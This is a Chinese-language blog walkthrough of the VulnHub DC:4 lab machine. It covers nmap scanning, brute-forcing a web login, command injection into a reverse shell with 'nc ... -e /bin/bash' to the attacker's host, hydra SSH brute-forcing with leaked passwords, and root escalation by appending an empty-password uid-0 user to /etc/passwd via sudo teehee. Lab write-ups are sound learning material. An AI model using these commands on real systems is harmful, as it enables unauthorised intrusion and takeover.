vulnhub-DC:4渗透笔记

信息搜集

探测IP

nmap扫c段:

nmap -sP 192.168.111.0/24

image-20240718155211151

可以确定IP为192.168.111.191

端口探测

nmap探测端口:

nmap -sV -p- 192.168.111.191

image-20240718155313518

可见开启了两个端口:

  • 22端口,ssh服务
  • 80端口,http服务

网页信息搜集

老规矩,先看看80端口的网页:

image-20240718155256688

一个登录框而且不是通用的CMS,那么思路就放在登录框对抗上

先扫目录看看:

image-20240718155424959

确实没啥利用点,直接开始我们的登录口对抗

漏洞利用

登录口对抗

这里首先考虑弱口令和sql注入,先抓个包爆破一下:

image-20240718152720235

用户名用admin试试,密码跑一下字典

image-20240718152820141

这不就爆出来了,密码为happy,直接登录:

image-20240718155531165

顺利进入后台,这里有个执行命令的选项,我们点run试试:
image-20240718155614070

这里是执行了ls -l,抓包看看命令是否可控呢:
image-20240718160133556

命令可控,将命令改为whoami,成功执行,思路对了,那么接下来肯定想到反弹shell了

命令执行反弹shell

kali上开启监听:

image-20240718160426968

接下来执行反弹shell的命令:

nc 192.168.111.132 4444 -e /bin/bash

注意参数的空格改为+号:

image-20240718160719599

连接成功:

image-20240718160808574

太丑了,python获取一个pty:

image-20240718161033903

舒服了,接下来应该就是权限提升了

权限提升

hydra爆破ssh

看看有没有什么可疑的文件比如sudo,suid之类的:

image-20240718162934835

没有太多收获,去家目录看看呢:

image-20240718163432974

可见有三个用户,而jim用户的文件有点可疑,仔细看看:

image-20240718164215415

mbox应该是个邮箱,但权限不够看不了

image-20240718163921124

test.sh是个普通脚本文件,但backups文件夹中有旧密码备份,很容易想到爆破ssh了,用kali自带的hydra一下:

hydra -l jim -P ./pass.txt 192.168.111.191 ssh

image-20240718164848722

ok了,密码是jibril04,直接ssh连接:

image-20240718165029135

成功获得了jim的shell

邮件泄露密码

看看jim有没有sudo权限呢:

image-20240718165201711

好吧没有,换个思路,刚才有个mbox文件还没看:

image-20240718165311743

确实是个正常邮件,说明该系统是开启了邮箱服务的,我们可以看看系统邮箱目录:

image-20240718165730636

发现charles发给jim的邮箱中泄露了密码,我们用该密码切换charles用户到试试:

image-20240718170004911

成功切换到charles

teehee打sudo提权

还是老规矩,看看sudo权限:

image-20240718170045492

发现可以免密sudo执行/usr/bin/teehee,恰好teehee可以用来打sudo提权:

teehee是个小众的linux编辑器,提权核心思路就是利用其在passwd文件中追加一条uid为0的用户条目:

echo "yuy0ung::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

按照linux用户机制,如果没有shadow条目,且passwd用户密码条目为空的时候,可以本地直接su空密码登录。所以只需要执行su yuy0ung就可以登录到yuy0ung用户,而该用户因为uid为0,所以也是root权限

我们直接添加一个root权限的空密码hacker账户,并直接su免密登录:

image-20240718170758550

成功提权并在/root中拿到flag

总结

本次渗透过程有如下漏洞或利用:

  • 网页登录口的弱口令爆破
  • 网页后台命令执行参数可控
  • 用户备份文件泄露密码
  • hydra利用泄露密码爆破ssh
  • 敏感邮件未删除泄露密码
  • teehee可免密sudo执行导致权限提升
posted @ 2024-07-20 02:34  Yuy0ung  阅读(17)  评论(0编辑  收藏  举报